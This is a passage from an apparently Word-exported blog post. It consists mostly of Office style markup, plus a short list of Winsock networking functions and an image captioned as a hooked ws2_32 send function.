UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</div>
<ul type="disc">
<li><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">recv</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">send</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsasend</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsarecv</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">closesocket</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsasocketw</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">connect</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsaconnect</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">select</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsagetoverlappedresult</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsaasyncselect</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">ioctlsocket</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsaenumnetworkevents</span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">wsaeventselect</span></li>
</ul>
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"> </span><ul type="disc">
</ul>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVbk4tQ8roYsXLYTfo7K93N1cNOLoqXnzSu51cGrYnG_HXuf9QEMMNLSm-0SlEllfUfLg_9Cal29eGDO1g2biUvjNjocdInXmGa95MZWpAzO5VlFLvCHSWEGSBG2O5cP0Erl_j-NiEMs/s1600/sendhooked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVbk4tQ8roYsXLYTfo7K93N1cNOLoqXnzSu51cGrYnG_HXuf9QEMMNLSm-0SlEllfUfLg_9Cal29eGDO1g2biUvjNjocdInXmGa95MZWpAzO5VlFLvCHSWEGSBG2O5cP0Erl_j-NiEMs/s400/sendhooked.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Hooked Send ws2_32 function</i></div>
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><span style="font-family: Times,"Times New Roman",serif;"><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
